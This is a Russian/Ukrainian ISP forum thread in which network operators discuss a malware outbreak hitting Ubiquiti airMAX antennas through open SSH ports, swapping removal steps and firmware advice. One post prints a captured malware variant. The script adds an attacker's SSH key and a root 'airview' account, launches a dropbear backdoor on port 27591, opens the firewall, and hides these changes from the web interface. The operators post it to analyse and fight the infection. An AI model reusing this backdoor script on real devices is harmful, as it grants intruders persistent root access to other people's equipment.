Перейти до

SDE

Рекомендованные сообщения

Нус, коллеги признавайтесь, кого сегодня грохнуло? :wacko:

Позиция убнт  на форуме особо порадовала)

 

Ссылка на сообщение
Поделиться на других сайтах
  • Відповіді 58
  • Створено
  • Остання відповідь

Top Posters In This Topic

ну моя позиция - незащищенным сервисам нефиг делать в паблик инете

пардон, вы ж презервативами пользуетесь?

есть куча воркараундов, от нестандартных портов, до сокрытия всего и вся и доступом только через VPN

последний, как по мне, один из самых надежных

 

боты брутят как UBNT так и MikroTik и вполне себе удачно это делают

боты ещё очень любят видео регистраторы))))

они вечно болеют всякими ntp/dns amplification

Ссылка на сообщение
Поделиться на других сайтах

Вирус атаки - СРОЧНО @UBNT

 

Кого ламанули и как с этим бороться ?

 

 

http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940

Ссылка на сообщение
Поделиться на других сайтах

Вот оно что, а то у нас техники третий день голову ломают, чего это Nanostation M2 в дефолте у некоторых абонентов.

Ссылка на сообщение
Поделиться на других сайтах

как вариант по ssh или telnet. Если не поможет ресет на антенне. а потом то что я написал. Прошивка у вас на них какая 5.5.6 и ниже? И не мешало бы обновить

Відредаговано gudwin888
Ссылка на сообщение
Поделиться на других сайтах
gudwin888, нет - это под старый skynet. Потом точки все равно "ломаются" через какое-то время. Лечится только UBNT-шной Removal tool CureMalware-0.7.jar  - http://community.ubnt.com/t5/airMAX-General-Discussion/Malware-Removal-Tool-05-15-2016/m-p/1564953/highlight/true#M55507

 

 

Она удаляет вирус с точки и прошивает на последнее firmware 5.6.5. Но там, сцуко, нет compliance test. Этот вирус ресетит точки по дефолту со старыми прошивками - и блокирует доступ через веб-интерфейс с новыми прошивками (передача данных при этом продолжает работать).

Ссылка на сообщение
Поделиться на других сайтах

та утилитка не помогает. папки DBG: /bin/echo -ne '\n.skynet=';[ -d /etc/persistent/.skynet ] && /bin/echo true; не существует. а существует  .mf. Я делал так

cd /etc/persistent
rm rc.poststart
rm -rf .mf
cfgmtd -w -p /etc/
reboot

потом обновил прошивку до 5.5.10  брал здесь http://rgho.st/58436490. Данная прошивка имеет compliance test

skynet папка это у старого вируса. Только вчера исправлял это

Відредаговано gudwin888
Ссылка на сообщение
Поделиться на других сайтах

Compliance test на 5.6.5

touch /etc/persistent/ct

save

reboot

Если прошиваться с прошивки с CT на 5.6.5, то после прошивки всё работает, просто в графе страна написано "выберите страну" и ничего не дает менять во вкладке wireless. Выше написанный код помогает. Если сбросить такую антенну потом на завод, то перед первым входом в вэбку нужно так же исполнить этот код, а потом выбрать при логине compliance test, он появится в списке.

Ссылка на сообщение
Поделиться на других сайтах

 

gudwin888, значит вы ее не правильно готовите:). Точки, которые у нас "ломанули" со старыми прошивками и были перепрошиты на прошивку 5.5.10 с compliance test в понедельник - сегодня опять ушли в дефолт. Все, что было прошито этой утилитой на 5.6.5 в понедельник - все работает. Все Наносы настроены роутерами, везде свои логины/пароли - ничего дефолтного. Т.к. это "дырка" в софте UBNT под Ubuntu (индусы, похоже, писали) - то эта утилита точно лечит.

 

Ссылка на сообщение
Поделиться на других сайтах

ну мое решение нормально работает, и проблема ушла.

А есть ли гарантии что проблема вновь не проявится на 5.5.10? На форуме ubnt сказано что нужно шиться в 5.6.5.

Ссылка на сообщение
Поделиться на других сайтах

может кто-нибудь в двух словах объяснить что вирус делает и как проникает?

Проникает через открытый наружу ssh 22 порт. 

Ссылка на сообщение
Поделиться на других сайтах
Взлом точек продолжается...

новая ресия вирусни

---------------

#!/bin/sh

if [ "$HTTP_HOST" = "localhost.localnet" ]; then

        PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH

        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETu

GB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9I

HM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys

        echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd

 

        if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then

                dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1

        fi

 

        dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null

        iptables -I INPUT -p tcp --dport 22 -j ACCEPT

        iptables -I INPUT -p tcp --dport 27591 -j ACCEPT

fi

 

grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)'

-----------------

Если я ничего не путаю, то это открытие бэкдора на порту 27591. Можно посканировать...

 

dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Вхід

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Зараз на сторінці   0 користувачів

    Немає користувачів, що переглядають цю сторінку.

  • Схожий контент

    • Від Інет.укр
      Продам 2011 червоний без sfp 1100грн
      з sfp 1300грн
      rb2011iL-rm 1500грн
      ubnt aircube  400грн
       
    • Від Biker13
      Цікавить питання, може хтось вже пробував. 
      Як можна в ubnt M серії в веб інтерфейсі залишити лише аналізатор спектру і більше нічого?
      Тобто щоб можна було залогінитись (можна і без логіна) на антену та одразу бачити спектр частот і все що там відбувається. Потрібно максимально швидке завантаження і лише одна функція.
      На питання "для чого?" відповідати не буду, нажаль трішки не той час. 
      В кого є ідеї напишіть будь ласка.
    • Від Mykola_
      2шт Powerbeam 5ac 500 бу ,в ремонте не были  .На одном лопнул защитный корпус , внутри в идеальном состоянии. В комплекте пое . Цена за один 4100



    • Від Туйон
      Нужно сделать временный радиомост.
      Куплю две живые, не ремонтированные, на 100% рабочие Loco M5 по адекватной цене.
      Можно без РОЕ.
      Предложения в ЛС.
    • Від Geely13
      Продам две головки Ubqt, вроде рабочие разбирались что бы добраться до резета, по 150 грн штука



×
×
  • Створити нове...